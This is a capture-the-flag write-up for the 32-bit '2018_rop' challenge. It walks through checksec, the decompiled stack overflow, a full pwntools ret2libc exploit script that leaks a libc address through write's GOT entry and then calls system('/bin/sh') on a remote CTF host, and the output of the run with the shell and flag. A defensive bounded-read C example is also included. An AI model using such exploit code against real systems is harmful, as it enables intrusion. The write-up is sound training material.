铁人三项(第五赛区)_2018_rop
Practice diligently, starting from the basics.
This challenge is about leaking libc and then getting a shell.
Solution walkthrough
1. Inspect the file
$ file 2018_rop
2018_rop: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=a6c3ab368d8cd315e3bb2b970556ed0510bca094, not stripped
2. Check the protections
$ checksec 2018_rop
[*] '/home/ctf/Downloads/pwnexercise/2018_rop/2018_rop'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)
NX is enabled, so the stack is not executable and we cannot simply write shellcode into the buffer and jump to it.
3. Decompile with IDA
int __cdecl main(int argc, const char **argv, const char **envp)
{
    be_nice_to_people();
    vulnerable_function();
    return write(1, "Hello, World\n", 0xDu);
}
The main function just prints "Hello, World"; nothing unusual here, so let's look at the other functions.
int be_nice_to_people()
{
    __gid_t v1; // [esp+1Ch] [ebp-Ch]

    v1 = getegid();
    return setresgid(v1, v1, v1);
}
be_nice_to_people takes no user input, so skip it.
ssize_t vulnerable_function()
{
    char buf[136]; // [esp+10h] [ebp-88h] BYREF

    return read(0, buf, 0x100u);
}
vulnerable_function reads up to 0x100 bytes from the user.
Looking at the buf buffer, it is only 0x88 (136) bytes long, so the read overflows it and reaches the saved ebp and return address.
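As an added defender-side example (not part of the original writeup), here is the shape of the unbounded read beside a bounded replacement, using the frame geometry IDA reported; the pipe-based self-check and the function names are constructed for this example.

```c
#include <string.h>
#include <unistd.h>

/* Frame geometry from the IDA listing: buf is at ebp-0x88, so 0x88 bytes of
 * buffer plus the 4-byte saved ebp precede the return address; read() gets 0x100. */
#define BUF_SIZE 0x88
#define READ_MAX 0x100

/* Shape of the original call: the length is unrelated to the buffer size
 * (in vulnerable_function buf is only BUF_SIZE bytes). Never called here. */
ssize_t unbounded_read(char *buf)
{
    return read(0, buf, READ_MAX);
}

/* Hardened replacement: the length comes from the buffer itself and one
 * byte is reserved so the result is always NUL-terminated. */
ssize_t bounded_read(int fd, char *buf, size_t cap)
{
    if (cap == 0)
        return -1;
    ssize_t n = read(fd, buf, cap - 1);
    if (n < 0)
        return n;
    buf[n] = '\0';
    return n;
}

/* Distance from the start of buf to the saved return address: the padding
 * length the writeup uses (0x88 + 4 = 140). */
size_t return_address_offset(void)
{
    return BUF_SIZE + 4;
}

/* Constructed self-check: push READ_MAX bytes through a pipe and confirm
 * the bounded reader stops inside a BUF_SIZE buffer. Returns 1 on success. */
int bounded_read_stays_in_bounds(void)
{
    int fds[2];
    char input[READ_MAX], buf[BUF_SIZE];
    memset(input, 'a', sizeof input);
    if (pipe(fds) != 0 ||
        write(fds[1], input, sizeof input) != (ssize_t)sizeof input)
        return 0;
    close(fds[1]);
    ssize_t n = bounded_read(fds[0], buf, sizeof buf);
    close(fds[0]);
    return n == BUF_SIZE - 1 && strlen(buf) == (size_t)n;
}
```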
4. Write the exploit
#! /usr/bin/env python
# -*- coding:utf-8 -*-
from pwn import *
from LibcSearcher import *

context(os="linux", arch="i386")
# context.log_level = "debug"

local = 0
elf = ELF('./2018_rop')
if local:
    pro = process('./2018_rop')
else:
    pro = remote('node4.buuoj.cn', 27508)


def get_libcbase():
    write_plt = elf.plt['write']
    write_got = elf.got['write']
    main_addr = elf.sym['main']
    # Overflow buf (0x88) plus the saved ebp (4), then call write(1, write_got, 4)
    # to leak the libc address stored in write's GOT entry, returning to main afterwards.
    payload = b'a'*(0x88+4)
    payload += p32(write_plt)+p32(main_addr)+p32(1)+p32(write_got)+p32(4)
    pro.sendline(payload)
    write_addr = u32(pro.recv(4))
    # Identify the remote libc from the leaked write address and compute its base.
    libc = LibcSearcher('write', write_addr)
    libc_base = write_addr-libc.dump('write')
    # print('libc_base_addr:%x'%libc_base)
    return libc, libc_base


def get_shell(libc, libc_addr):
    binsh = libc_addr+libc.dump('str_bin_sh')
    system = libc_addr+libc.dump('system')
    # Second overflow: return into system("/bin/sh"); 'AAAA' is the dummy return address.
    payload = b'a'*0x88+b'b'*0x4
    payload += p32(system)+b'AAAA'+p32(binsh)
    pro.sendline(payload)
    pro.interactive()


if __name__ == '__main__':
    libc, libc_addr = get_libcbase()
    get_shell(libc, libc_addr)
The first payload calls write to leak a libc address and compute the offset to the libc base; only then can the second payload get the shell.
5. Get the flag
$ python3 2018_ropExp.py
[*] '/home/ctf/Downloads/pwnexercise/2018_rop/2018_rop'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)
[+] Opening connection to node4.buuoj.cn on port 27508: Done
Multi Results:
0: archive-eglibc (id libc6_2.19-0ubuntu6_amd64)
1: archive-old-eglibc (id libc6_2.17-93ubuntu4_amd64)
2: http://ftp.osuosl.org/pub/ubuntu/pool/main/g/glibc/libc6-i386_2.27-3ubuntu1_amd64.deb (id libc6-i386_2.27-3ubuntu1_amd64)
Please supply more info using
add_condition(leaked_func, leaked_address).
You can choose it by hand
Or type 'exit' to quit:2
[+] http://ftp.osuosl.org/pub/ubuntu/pool/main/g/glibc/libc6-i386_2.27-3ubuntu1_amd64.deb (id libc6-i386_2.27-3ubuntu1_amd64) be choosed.
[*] Switching to interactive mode
$ cat flag
flag{d321f7a3-c8d3-442d-8394-07478c529711}
$
[*] Interrupted
[*] Closed connection to node4.buuoj.cn port 27508
Done.